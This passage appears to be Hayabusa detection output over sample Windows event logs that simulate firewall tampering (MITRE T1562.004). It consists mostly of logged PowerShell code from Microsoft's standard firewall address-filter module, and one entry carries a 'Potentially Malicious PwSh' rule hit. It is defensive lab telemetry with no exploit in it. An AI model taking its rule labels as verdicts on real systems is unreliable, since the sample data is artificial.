+09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.871 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.872 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.873 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.926 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' -Alias '*' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.926 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' -Alias '*' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.926 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.926 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.927 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallAddressFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.927 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline 